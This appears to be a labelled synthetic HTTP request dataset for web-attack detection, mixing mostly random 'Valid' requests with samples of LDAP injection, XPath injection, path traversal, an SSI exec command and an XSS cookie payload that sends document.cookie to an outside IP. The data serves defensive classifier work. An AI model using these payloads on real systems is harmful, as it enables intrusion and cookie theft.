class: LdapInjection
GET /Hicx9iaeebj3hnbee/oet61hte6/snccssbmocatreeui/Z@/Cposition/I0ea.asmx?gB7e=7814%29%28%26%28objectClass%3Dequ%29%28%7C%28sn%3D+l9Je%29%28cn%3DSrir++++J*%29%29 HTTP/1.1
Host: 253.119.170.121
Connection: Ehat4
Accept: */*;q=0.2
Accept-Charset: *;q=0.1
Accept-Encoding: compress;q=0.9, identity;q=0.1, identity;q=0.0
Accept-Language: 7-0stxa;q=0.9, batlrop3-vrn, beo-r;q=0.9, hegPOrba-tnhgm6A
Cache-Control: max-age=41
Client-ip: 118.166.126.189
Cookie: dojtrcu=/$a+~phtpasslog;t+i4zadmin/catqn;bnsa7maahelea=smeso;nushRiUejnsor1h=ern;wdevk0ecneidn=rRA_Jq;xvxo3hehsoNoI0n=0944143630;h1=o0YbDTdejsx
Cookie2: $Version="020"
Date: Thu, 15 Jul 04 07:47:01 GMT
ETag: W/"ex2f5I_0004_3pr7.R--"
Expect: idorit=hhox;9ha3ae=2Vh6e
From: nslcao@cr2ir.it
If-Modified-Since: Tue, 29 Sep 09 16:12:50 GMT
If-Unmodified-Since: Sat, 26 May 07 02:09:24 UTC
If-Match: "@0sTaB9Jcv1mpZiO"
If-None-Match: "8BM@y_AICcHs5q@xQG2"
If-Range: Wed, 27 Sep 06 24:49:44 UTC
Max-Forwards: 64
MIME-Version: 4.7
Pragma: reatf='dmel7d'
Proxy-Authorization: Basic ZGk5b2g6bmZpcmU3
Authorization: Basic cmVzZXJxOnJFZXRubg==
Range: 447995-1,-181875,4-55620
Referer: /kojtw8a/ggFhh.ace
TE: chunked,gzip;q=0.2
Trailer: Via
User-Agent: lsexnecLB2 http://www.drs8s2.st
UA-CPU: 68000
UA-Disp: 529,581,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 617x3755
Via: HTTP/3.9 186.137.60.44
Transfer-Encoding: 6mna
Upgrade: stee/0.5, Rob/4.7, geii2/2.7
Warning: 330 www.aiew2aRa.jpg "huTweibwmAEeQpte" 
X-Forwarded-For: 67.99.234.48
X-Serial-Number: 85332942046227560401
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37104
Start - Id: 31128
class: Valid
GET /seGuXhm9YKd7SseO_/wn25bQmOi/Rby5z/auxGq6KOcX0@h/giovatosooenfiec/e9oai/9y./s3c8YTYxH9/he/ogQ/Vei.html?dAYv323Hs=avY8_%40ql&tn6rtettc5b=o1efwo&orsrtk=sdocumentff%3Dp%3D&aoancwop81eiwap=nrhm&enadld=2nposition%2Bdzimg%28z%3Ena+f&wla=134861&I68je=0284053375&sh8a=6213193&iewsh=817762&sgntmeeltyYoer1=ah9 HTTP/1.0
Host: www.vNsSouba.de
Connection: tieaie
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: gzip;q=0.7, compress;q=0.8, gzip;q=0.5, gzip
Accept-Language: esycny-szahec, ge5ei-8ktirvw, tno-Tnvs4;q=0.4, erprntt-geus;q=0.6, eauqeko-8ogc;q=0.1
Cache-Control: no-transform
Client-ip: 105.115.34.10
Cookie: ohoej=isRe9Fee0rn
Cookie2: $Version="4"
Date: Sun, 02 Dec 07 03:55:54 GMT
ETag: W/"b-6k0s1180.TWaa"
Expect: 100-continue
From: siootl@omb9t.it
If-Modified-Since: Sun, 15 Oct 06 13:46:40 GMT
If-Unmodified-Since: Tue, 22 Jan 08 10:07:53 GMT
If-Match: *
If-None-Match: "7EZnlLDBCi5KVIx-"
If-Range: Sun, 12 Apr 09 23:44:17 UTC
Max-Forwards: 5
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: Basic clNjbzpuNWVl
Authorization: NTLM eWZhc2FyZXdkaW83cDNhdGV0aGllZGF0c21laUxub3V0ZW0=
Range: 8-,092-,97-3
Referer: http://www.iAaj.com/eadiq/tteuuco.jpg
TE: chunked,trailers
Trailer: Accept-Charset
User-Agent: GEd3e/3.8.6
UA-CPU: Sparc
UA-Disp: 705,2830,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 2629x943
Via: FTP/9.9 www.eauety.jpeg, 9.4 www.twthcee7.js:08
Transfer-Encoding: compress
Upgrade: 2ro3rd/5.8
Warning: 531 12.11.199.179 "7sIteagooaerfgi" "Thu, 28 Feb 08 11:33:38 CET"
X-Forwarded-For: 129.20.120.4
X-Serial-Number: 16589272146
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31128
Start - Id: 5758
class: Valid
POST /eoz7G9e2orno/yprkCRhG98s@/aTKvsWk1d5/h0iAimDr/rKdefQOYsam/rnsllbr8/aWPNvU4JLhLMavTS@H.tiff? HTTP/1.1
Content-Length: 67
Content-Language: aesapsd,fe2nua
Content-Encoding: identity
Content-Location: /Ewnsnrz/g9ec0yet/chhn/Mspaf.aspx
Content-MD5: b3FFaG9zRWl0bnJ0YTVPcw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 21 Feb 07 11:22:20 UTC
Last-Modified: Sat, 03 Feb 07 01:46:24 CET
Host: 122.165.81.222
Connection: close
Accept: audio/*;q=0.4, text/*
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: no-cache
Client-ip: 81.12.197.78
Cookie: leofastr=2;ecsiueQ=46372984;9s1ehcihg6bl=64284;aEIOchsheieriab=n-J3PowfZ;8laseti=506
Cookie2: $Version="7"
Date: Sun, 21 Aug 05 20:25:12 GMT
ETag: W/"QAOOZuX2WPjs483"
Expect: 100-continue
From: EAQohd@tbaccLu.st
If-Modified-Since: Mon, 24 Oct 05 11:30:06 UTC
If-Unmodified-Since: Fri, 25 Mar 05 17:03:24 UTC
If-Match: "FNEW3oSbkj3irZCN"
If-None-Match: *
If-Range: Sat, 18 Jun 05 22:57:03 GMT
Max-Forwards: 7
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: seRi Rni3ct=uedaamar
Authorization: Digest opaque="enqa"
Range: -15
Referer: http://www.c3midSo.fr/iObsizsn/lrttl.exe
TE: trailers,gzip;q=0.1
Trailer: TE
User-Agent: rdD4sRC http://www.o4mmo.org
UA-CPU: 68000
UA-Disp: 6915,168,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 2088x8163
Via: 3.5 www.4sr9sega.htm:02, FTP/5.3 135.98.83.184, 26H0/5.4 www.oEtweae.jpg
Transfer-Encoding: compress
Upgrade: snbi/3.7, glmEeo/6.6, e8eA/3.9, rtg/0.0, ntx/4.7
Warning: 089 www.oRtti.html:26745 "tmttce" 
X-Forwarded-For: 37.13.252.62
X-Serial-Number: 74000627821208
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

jIgucOlldbhlhl5=ookrtpAet&M_YYwg=uofte3oalt&Oynols=window.open2rvor

End - Id: 5758
Start - Id: 10080
class: Valid
GET /s0Wc3JwG.msf?mfxtermzS7Lselectjchilda=30994&sWisAotfaan=ok23LS&cM0N=k%40%3Fzsxih&stylehrMcBWbO.9Y=yt%2FE&Dhnswrxea=3iwgetaa4&2aoh=daliM HTTP/1.0
Host: www.et4n.de
Connection: close
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: identity, gzip, identity;q=0.3
Accept-Language: *;q=0.7
Cache-Control: no-cache
Client-ip: 179.34.55.202
Cookie: ivhGuli=ej0Udupm6;leerySlanf=oetYoaJlan;zhesa6rarttan=h;ohmtd=164;mhzl3sj=rdtVZmaw-2
Cookie2: $Version="231"
Date: Thu, 07 Feb 08 24:57:18 GMT
ETag: W/"Tw9hk2SDw2rnBAKa2m"
Expect: nEndi
From: aemYeste@u736nnw.biz
If-Modified-Since: Fri, 08 Sep 06 13:19:55 GMT
If-Unmodified-Since: Fri, 08 Jul 05 24:29:42 GMT
If-Match: *
If-None-Match: "3vLXk2kCGt@sp7QM27sN"
If-Range: Thu, 23 Feb 06 04:49:29 CET
Max-Forwards: 5
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Basic d2lia25yczpzNnR0
Authorization: Digest nc=68BfDAc0
Range: 1978-3,68-
Referer: /hwuS0pD2/Gfeouw/wn6eze/S2fe6de.tiff
TE: gzip;q=0.3
Trailer: Connection
User-Agent: 2oiseaotns/4.1.7
UA-CPU: 68000
UA-Disp: 886,964,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 6453x8240
Via: 4.4 209.92.162.230, 9.6 204.21.198.110:9, 7.1 196.104.119.22
Transfer-Encoding: gzip
Upgrade: eli/4.7, 0iu5ie/2.0, hlvc3/8.3
Warning: 775 160.139.89.107 "jar0wts" 
X-Forwarded-For: 219.87.157.60
X-Serial-Number: 78634326822916597
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10080
Start - Id: 26705
class: Valid
GET /cyPpIXXGG-echoAU1/8XZz8LA1OncRWT.tfD/keYGPKiwG44ddocumentEy/H1tFGxLwXRpCK/jd/spehaeltid5eo5/tUtmuwnt0imho/ojxsScffsoaaipnodins/rVPUTv/TcoleGhdsiut.htm? HTTP/1.0
Host: www.erof.cz:80
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: otog-aet3eHez, eitiTbee-e;q=0.3, w-jt
Cache-Control: iofuht=mt7ulno
Client-ip: 12.213.50.115
Cookie: crg6S_libFtHl=v9txtermhome tusdrradrop+ dstO;iaysN=il50h_fa-0
Cookie2: $Version="4"
Date: Fri, 11 Aug 06 03:34:48 GMT
ETag: "T8@J8mWCMvFmLewuG"
Expect: 100-continue
From: erpEn@cctbogs3k.biz
If-Modified-Since: Sun, 18 Sep 05 18:01:33 GMT
If-Unmodified-Since: Wed, 22 Dec 04 08:01:55 CET
If-Match: "stlx6FamWXzRKmSBFFhx"
If-None-Match: *
If-Range: Mon, 16 Oct 06 23:10:49 GMT
Max-Forwards: 90
MIME-Version: 1.9
Pragma: 00t1='amwa'
Proxy-Authorization: Xtgt8g gueh9=jopucso
Authorization: btporI teCo=uain
Range: -9,-778
Referer: http://esoadt.cz/mrsis9So/gddct.mdb
TE: trailers,trailers,gzip
Trailer: Accept-Charset
User-Agent: Mozilla/0.3 (Machintosh; U; PPC Mac OS X 7.7; mi-lh; rv:7.0.9) Gecko/88877575
UA-CPU: 68000
UA-Disp: 221,658,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 231x546
Via: 7.4 11.171.211.237:0, 5.9 151.50.202.70:96642
Transfer-Encoding: gzip
Upgrade: xu4y/7.3, 8gru8/4.9, iehAs/2.8, a3va/9.5, cwa/8.5
Warning: 073 www.moiongc.htm "daoe" 
X-Forwarded-For: 168.224.202.103
X-Serial-Number: 55910
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26705
Start - Id: 46695
class: XSS
GET /zxJ0zwulrpF/he3igdjrytmtcApesrbm/ifnbenarmzetlnet/DDC/auBp7hpF@@4/tEYomwsUU0O0d2zH/sso.htm?sgtatslo=969800659&An4ssq89emmh=cLG&tidnoOampo0el=n%7EnN%28%3FH&positionR8bineval.@=daakdh+5eiUh&Tv3A5R_POC=ecfuyhEeel&Oisxam0hetnng=etnMLdwmkqELiHh5e&isfecnlAderlhs=rRBvE7&AtinNmtem=110844&d9yaasi=ejCC6M&npn=91390&P8v@F5svE=+xml&X9eujetistig=g0processing-instructionq&3aee=9mr%3Cuscriptni%2FndQi HTTP/1.1
Host: 174.66.101.211:80
Connection: close
Accept: text/*, video/mpeg;q=0.4, application/x-tar
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: gj-m
Cache-Control: no-transform
Client-ip: 161.213.71.224
Cookie: omirmyee6ehm=<img  src=" mocha:[window.open('http://154.12.75.159/taes.dll'+document.cookie);]  ">;anl9tyeiedeu=aWUnJe
Cookie2: $Version="784"
Date: Fri, 13 May 05 17:53:11 CET
ETag: W/"6ly-0NbszirDFM@mN"
Expect: 100-continue
From: o3l0frtJ@feefLd7g.org
If-Modified-Since: Sun, 10 Oct 04 24:12:53 CET
If-Unmodified-Since: Tue, 18 May 04 11:43:24 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 0199
MIME-Version: 0.5
Pragma: no-cache
Proxy-Authorization: 6eo7l rrpb=5fahe
Authorization: Basic bmFpMWFlZjoyc2xv
Range: -441983,369-,-36125
Referer: http://www.9gnh.uk/esne/eh6agio/6fjt/i9fy36/hdinkr.gz
TE: trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/0.2 (compatible; MSIE 9.4; Linux i586; dEoab; lltauaro; vgettPsfr)
UA-Disp: 232,926,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 007x164
Via: iuog/8.4 83.73.107.128:0, 5.9 12.246.66.116, FTP/6.3 www.0nognte.htm:6158
Transfer-Encoding: compress
Warning: 551 www.rrtles.tiff "mtemnedikCwpaoSe" 
X-Forwarded-For: 246.25.36.156
X-Serial-Number: 9170068717
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46695
Start - Id: 45015
class: PathTransversal
GET /an1e9dtdspEgrFOsa8tr/toyukf/irtsw1oaomtctte/pgaBisCo/sock_streamXuM7K/sto85rvlc.htm?jsfsamia0=07&lJCbinWmCwV=e4Il3Zblah0&pHtdS=rF0IZDtSpBg&n4poTnieze3=file%3A%2F%2F%2Fc%3A%2Fxt%2F3E%2Fdare.xml HTTP/1.0
Host: 20.13.115.26
Connection: close
Accept: */*
Accept-Charset: iso-8859-8-i;q=0.9
Accept-Encoding: gzip, deflate;q=0.9, compress;q=0.1, identity;q=0.7
Accept-Language: *;q=0.1
Cache-Control: max-age=29
Client-ip: 224.116.96.83
Cookie: jaxqttfd=t1_GHMi8;a9tmpC2JNH6=bRt
Date: Tue, 12 Jul 05 03:08:28 CET
Max-Forwards: 8
Pragma: no-cache
Referer: /eweor/noworuo/rfe1w/otjn.php
User-Agent: ewqcl (squ-Fg; tNXOZ2bv; n@Wiw2ERqb)

null

End - Id: 45015
Start - Id: 11917
class: Valid
GET /ttio/ezstue0ioar7Jfevc/td3jR5iEQZJ.-j.7T7R./tcb4ypciw/NWVGwlikeqAF/uia8eo/j@wqnFgsdeK/CcBAf8MDlikepzo@/elamFf9irzRtedtsed2/U9WfrlXxub@o8v.gif? HTTP/1.0
Host: 76.146.46.107:80
Connection: tNezyea5
Accept: */*;q=0.8
Accept-Charset: iso-8859-4;q=0.7, iso-2022-kr, iso-2022-kr;q=0.9, iso-8859-7, x-mac-ce
Accept-Encoding: *;q=0.8
Accept-Language: esReoe-td47y;q=0.3
Cache-Control: no-cache
Client-ip: 36.192.218.186
Cookie: ioh=L5vhU3i7dme;baNusebZypsa=%ru;ca6sRsiizi=93207397
Cookie2: $Version="334"
Date: Tue, 24 Jul 07 15:35:39 GMT
ETag: "Zwd-lHPSxRrZEPmq_j"
Expect: 6qr0=i4aoht
From: rvee8@dNru.biz
If-Modified-Since: Thu, 29 Apr 04 02:48:08 CET
If-Unmodified-Since: Tue, 21 Jul 09 23:38:24 UTC
If-Match: "oLok_eVVP4yz8tP96PF"
If-None-Match: *
If-Range: "ndYH@yTIOWNin0khFD"
Max-Forwards: 9237
MIME-Version: 8.1
Pragma: Hisiia1=4ak
Proxy-Authorization: ztdEd h20fucee=kKttnw
Authorization: Basic bWVFbmFpOjdkSWto
Range: 51056-,-4247
Referer: http://www.ei9alste.de/zutscrn/nifa/0nsrgq/ah4tr.gif
TE: trailers,trailers
Trailer: If-Modified-Since
User-Agent: BYym4ntlM/4.0
UA-CPU: x86
UA-Disp: 566,0698,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 5682x182
Via: metef/2.0 175.81.12.32:875
Transfer-Encoding: gzip
Upgrade: heosIt/7.3, ahu/7.4, meusj/3.1, anau/6.1
Warning: 289 www.Irbdorr.jpeg "eeerr0uart" "Fri, 11 Mar 05 10:40:23 GMT"
X-Forwarded-For: 230.225.78.26
X-Serial-Number: 071844089
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11917
Start - Id: 5201
class: Valid
PUT /hodguehLhJaeueboPet/sEts.js? HTTP/1.0
Content-Length: 148
Content-Language: 2jlda,srnh,q2qY
Content-Encoding: identity
Content-Location: http://www.asRyo8ja.org/hneai.cfm
Content-MD5: ZXdlN3FvYzB2ZWU4b3BzZA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 05 Sep 06 01:19:43 UTC
Last-Modified: Mon, 12 May 08 05:49:11 GMT
Host: 80.114.0.51
Connection: suwicai
Accept: */*;q=0.2
Accept-Charset: euc-jp;q=0.9, iso-8859-1, windows-1251, ks_c_5601-1987, cp-932
Accept-Encoding: identity;q=0.2, deflate, identity;q=0.1
Accept-Language: qti4e-nShoTrig
Cache-Control: max-stale=14
Client-ip: 65.23.172.54
Cookie: weoler=0r;ecmemnfUt=5
Cookie2: $Version="9"
Date: Wed, 06 Feb 08 03:15:31 UTC
ETag: W/"XIDp6nIWE@M@JC_Zu9Mo"
Expect: 100-continue
From: rbstcLe8@fi0i.uk
If-Modified-Since: Sun, 18 May 08 08:01:52 GMT
If-Unmodified-Since: Sun, 18 Jan 09 02:24:06 UTC
If-Match: "xneQDEueY9-QVQnHNsqB"
If-None-Match: "djJ-uSu@W_KIjUC"
If-Range: Sat, 08 Apr 06 15:58:51 CET
Max-Forwards: 267
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: NTLM cnptb29HaWVua0huZUF5b3luenVlYWlUcGFoaWVpbkliZXJFbHVhb2t0YTlX
Authorization: Basic ZWV0VG50dDp4b2hkZWllNg==
Range: 8-,441-787
Referer: /ohuielf.fgf
TE: chunked;q=0.6,trailers
Trailer: Range
User-Agent: 1nltEltco (a@vggWV6T@; mT4k708X)
UA-CPU: MIPS
UA-Disp: 696,288,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 523x221
Via: 6.2 165.66.239.10, 3.3 81.192.245.137:26
Transfer-Encoding: deflate
Upgrade: KrhdGB/4.0, shDEy/8.3, qefaou/5.5, axat/2.9, hEyue/8.6
Warning: 691 221.151.61.56 "uSnbuJr" 
X-Forwarded-For: 121.55.87.94
X-Serial-Number: 083639126
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

sBX63XTG@v7R=stet&Exe=meewuiytpolocationc&i6dseieUt7=27&nodedycseonoes=6730&enxisln=9819804&iumhcrmas=3178060&r2eA=nn1aAenitse2dsatnn&mUsetpry=Elia9

End - Id: 5201
Start - Id: 26591
class: Valid
GET /moll/eBSPOL_P2.Kp/ntsoz/irttvseye/oh.tiff?twvltepeoeA=3c HTTP/1.1
Host: 2.37.86.84
Connection: eAoyeYa
Accept: audio/*, image/gif, application/*;q=0.2
Accept-Charset: iso-8859-8, x-mac-cyrillic, windows-1252, iso-8859-1;q=0.6, iso-8859-6;q=0.8
Accept-Encoding: compress;q=0.0, deflate;q=0.9, deflate, gzip, compress
Accept-Language: aeqIs-zwI5
Cache-Control: no-store
Client-ip: 183.22.7.137
Cookie: tQsqh=25145911;toFrwlOa=sR/e n;Kslibtl3K;hw=fkAaeuyn4aaa;ye9r=nomttlttybdiolr
Cookie2: $Version="0"
Date: Tue, 15 Jun 04 01:59:50 CET
ETag: W/"eSGBUSsnP9_6ns8"
Expect: 100-continue
From: aucneam2@riewaCaudy.st
If-Modified-Since: Tue, 29 Jul 08 06:26:45 GMT
If-Unmodified-Since: Mon, 01 Nov 04 16:04:53 GMT
If-Match: "PAlNZCQ95FOCljXCCt"
If-None-Match: *
If-Range: *
Max-Forwards: 59
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: au13e aEcnhOk=onGmniIh
Authorization: Basic dHhJbmFNOmNobm9EMw==
Range: 12361-,4-
Referer: http://www.eopweoe.be/sIodio/id4roe7e/hedcge/Eghals.gif
TE: trailers,chunked;q=0.1
Trailer: Accept-Language
User-Agent: Mozilla/2.1 (compatible; Konqueror/4.7; SunOS sun4u; roidd)
UA-CPU: Sparc
UA-Disp: 927,0967,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 335x343
Via: 1.7 254.87.222.113:4
Transfer-Encoding: tnpon
Upgrade: zIHnm/4.6, I4l/5.6, hae/9.1, cflau/8.1
Warning: 846 14.21.113.100 "fyetrt" 
X-Forwarded-For: 50.138.39.114
X-Serial-Number: 693373977262
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26591
Start - Id: 32939
class: Valid
POST /ayvM4C8Kw.tiff? HTTP/1.1
Content-Length: 255
Content-Language: rophme
Content-Encoding: identity
Content-Location: /6rrwlu/oEtpata/siexan3j/eOorlcov.avi
Content-MD5: czVlOUFoMzRpc0huc3pyaA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 28 May 04 11:41:34 UTC
Last-Modified: Sat, 15 Jan 05 21:54:35 GMT
Host: 156.253.15.53
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: euc-cn;q=0.9, iso-8859-4, windows-1254;q=0.2, windows-1251;q=0.2
Accept-Encoding: compress, gzip;q=0.6
Accept-Language: f0-9Frerbu;q=0.0
Cache-Control: only-if-cached
Client-ip: 238.118.139.7
Cookie: cryteowqfohmte=8e1j;reMwar=7EUwfh8Jj;heuu3ncb5E=rzonsAtte
Cookie2: $Version="73"
Date: Sun, 13 Sep 09 07:58:01 GMT
ETag: "0@CY0H.LM9MHonM4_Mj"
Expect: u9gathqa=n7owux;ahnene=nAnesmhc
From: cpts@U3ei.ch
If-Modified-Since: Fri, 05 Mar 04 01:25:23 GMT
If-Unmodified-Since: Wed, 15 Jun 05 11:00:57 GMT
If-Match: "yhNyzjjMiiPJt5NLYjc"
If-None-Match: *
If-Range: "GjCV.v84FUts5GPjLoF"
Max-Forwards: 492
MIME-Version: 2.6
Pragma: ff='oa'
Proxy-Authorization: NTLM YXJhY2Vub3VPVGwzcGVpNUFyd2VHdWVvZWF1eXVneGxhZHNvaFVhZTMzRUVkZW8=
Authorization: Digest nonce
Range: -47,-9,85075-
Referer: http://www.n6ufetc.cz/lc1suatb.dll
TE: chunked;q=0.2,chunked,trailers
Trailer: User-Agent
User-Agent: encxoba (ePY-zaZBE; 6yKvJwqj; oby-X2s; dy7B0y31M; tlr@NCW8)
UA-CPU: 68000
UA-Disp: 6130,7497,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 6323x133
Via: FTP/5.1 33.138.130.84, 6.1 www.s7eaewq.html
Transfer-Encoding: identity
Upgrade: bja5e/7.6
Warning: 969 www.iwaap8th.png "eRetmltiagr" "Fri, 18 May 07 08:22:34 UTC"
X-Forwarded-For: 96.92.231.105
X-Serial-Number: 58527573355
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

pkat1=hhis&eiietcdzudt=bh=&wwh7eytatieae=nzJtJJ3o&lAmrbo5pmsclib=rid6=Docnttr&wtaIape0eu=17195&2a_.=843394&trSwR0ifet=7935&lnTtdcd1ai=7400&SdfaRnesantEklh=e35gVn9MKyCT&tnoDc=ec&amMa3xmoSualrs=on&DAVwhereXVl0=falikeeodo0ds&wss2n6=6&bexec8mJa=sEvvar9sne

End - Id: 32939
Start - Id: 49265
class: XPathInjection
GET /AD7ctAora6aap8a/hru9crrbni/ye/e0woOhZ/eGCmVOtgnOEMIH1tj0/sb6s_FjLr2r1J8Cid0Fl.jsp?eeira4seo2hyocj=s8r%27+or+%28i+%3C+count%282w0icE%2Fchild%3A%3Atext%28%29%29+and++j++++%3C++count%28rczne%2Fchild%3A%3Acomment%28%29%29++++and++k+++%3C+++count%28osw8%2Fchild%3A%3A*%29+%29++++or++++%27enFa%27+++%3D+++%27+++xahNibt%27+++++or&hmrad=258581&yor=uTiHdn&rsSRthLaho=VhjitfeAbit HTTP/1.1
Host: www.aycc6aPld.fr
Connection: keep-alive
Accept: audio/*;q=0.3, video/quicktime;q=0.4, image/*
Accept-Charset: cp-936
Accept-Encoding: deflate, deflate;q=0.5, deflate, identity;q=0.7, identity;q=0.1
Accept-Language: *
Cache-Control: max-age=418
Client-ip: 127.113.238.119
Cookie: eTcb=&a;tmnHpeieor852l4=be58J;sack7Q=piNtT4Go;ii=notNrneAhydso;dhoFb0zt3edTto=ogIqh
Cookie2: $Version="395"
Date: Wed, 06 Apr 05 10:21:43 UTC
ETag: W/"ZV0IuBoKXgf8El@kwj"
Expect: GerE30=m8mee1ye
From: lqie@4vraituc.com
If-Modified-Since: Fri, 29 Apr 05 23:55:34 GMT
If-Unmodified-Since: Wed, 20 May 09 03:32:47 UTC
If-Match: "BDtvTsfxuvGBbLM"
If-None-Match: "DMd1uBrJCgw4A5B"
If-Range: "8bMzJAtr9LETKr2"
Max-Forwards: 76
MIME-Version: 1.6
Pragma: 4acmb=t0a
Proxy-Authorization: Basic bm9UdXk6cTBud210
Authorization: NTLM M2Jid2VpZzZzZHRtMWxTZWhpcGM3aWRwZXRCbG9mcm1lZWduZHJoamV5b3Q4dGM=
Range: 560-83908
Referer: /sssF4M/exzScnet/Iyrs.dll
TE: gzip;q=0.5
Trailer: TE
User-Agent: iJfpluOC.D http://www.hva4mccl.cz
UA-CPU: x86
UA-Disp: 8141,3666,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 666x0440
Via: 2.2 197.241.147.220
Transfer-Encoding: deflate
Upgrade: ee0N/5.7, ya0/9.2, ekl/0.1, ersamh/6.5, Blfo/3.2
Warning: 952 www.opnaAke.tiff "wdiercrcmppwienapny" 
X-Forwarded-For: 199.200.159.0
X-Serial-Number: 15070707581939695
----: -----------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 49265
Start - Id: 31089
class: Valid
GET /wmVn.htm?tgm96=oAWR4nYD7jH HTTP/1.1
Host: 212.191.97.44
Connection: close
Accept: */*
Accept-Charset: iso-8859-2;q=0.4, iso-10646-ucs-2;q=0.4, windows-1258, ks_c_5601-1987
Accept-Encoding: *;q=0.1
Accept-Language: nte-re, 0t0ihao-n3im
Cache-Control: no-transform
Client-ip: 6.188.213.77
Cookie: fQwsock_streaml=eemebh?uiue[;etrs=qN4ap4KH8
Cookie2: $Version="015"
Date: Sat, 07 Feb 04 02:38:25 UTC
ETag: "omCXPrc0YCBdZq.n"
Expect: imamsYsm
From: adoettne@ke1r.ch
If-Modified-Since: Mon, 27 Jun 05 02:06:56 UTC
If-Unmodified-Since: Tue, 09 Nov 04 15:18:30 GMT
If-Match: "56hfA3erVKsnbMn"
If-None-Match: *
If-Range: Mon, 23 Jul 07 03:16:40 CET
Max-Forwards: 0750
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: NTLM YWU2N1dlc3NnZHRxcXN0ZWhlZWllR3l0aWRsbHNyZHdoZjJzbm9oaQ==
Authorization: Basic M3N3dXRlOmVHd3R0
Range: -86214,0-5,7241-7
Referer: http://www.eIvhe.com/h9nscie/pi3t/a7nha/o0ooiA/tthcre.msf
TE: gzip,chunked;q=0.8,chunked;q=0.7
Trailer: TE
User-Agent: Mozilla/7.0 (X11; U; Unix 4.3; fd-sc; rv:8.6.8) Gecko/34157467
UA-CPU: MIPS
UA-Disp: 334,6065,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 1573x3760
Via: FTP/3.8 www.eeuhn.tiff, 2.3 www.fasirgh.css
Transfer-Encoding: gzip
Upgrade: pOeLoo/5.5, vme/0.8, dnk/2.7
Warning: 301 www.dh1xee3.shtml "oNgpah" "Mon, 27 Nov 06 14:15:58 GMT"
X-Forwarded-For: 103.210.16.171
X-Serial-Number: 30237694505
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 31089
Start - Id: 39985
class: SSI
GET /itFCob/Ti0tn9efetdUeo7oy/suyisntYajtPe/u@mHG/ypn1tlb/tCUZb.AQ2B/3s7/tcuaaywldrnsyst4Foao.msf?vekotembfcn=%3C%21--%23exec+++cmd%3D%22%2Fbin%2Fls+++++-l+++++%2Fhome%2F553udnrte%2FelmT%22++--%3E&QG-fVOT=ten88r&2i.uhbgsoundcz@c=t+%26toiAon&@X.yCk=eo5%3E&twlehaviYe=jN.uaFr5y&cmdT9Frbi=115337&esift=nbgsounda HTTP/1.0
Host: 230.20.251.10
Connection: keep-alive
Accept: image/jpeg, image/png;q=0.4, video/quicktime
Accept-Charset: *;q=0.5
Accept-Encoding: deflate, compress;q=0.0
Accept-Language: lnaR-nniees, gr-othhoee5, rvl-l9S
Cache-Control: no-store
Client-ip: 8.168.66.173
Cookie: khuleoeslNoy= d;hstlvetqhoemea=a l;1rlftl=8064305801;ojoudebegl5iao=aOqeifrDrRTin;bx1h2axbyN7acw5=0
Cookie2: $Version="941"
Date: Mon, 19 Jul 04 15:57:31 GMT
ETag: W/"_bPQwMT@Vkx-eIVQ"
Expect: 100-continue
From: 5iWxsCt@nr6efecsn.de
If-Modified-Since: Sat, 30 Apr 05 20:33:05 GMT
If-Unmodified-Since: Mon, 09 Jul 07 03:36:18 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 16 Mar 07 01:57:56 CET
Max-Forwards: 6
MIME-Version: 3.3
Pragma: 71h=sO
Proxy-Authorization: NTLM NlQ2YWhtdWl0dGR2TGxlem9OZW50dG9vaXI5VTVicmlzc2xnbm9rZW9sdGVuZWU=
Authorization: aNtti hpho=sbL68
Range: 618-573,4-,461-
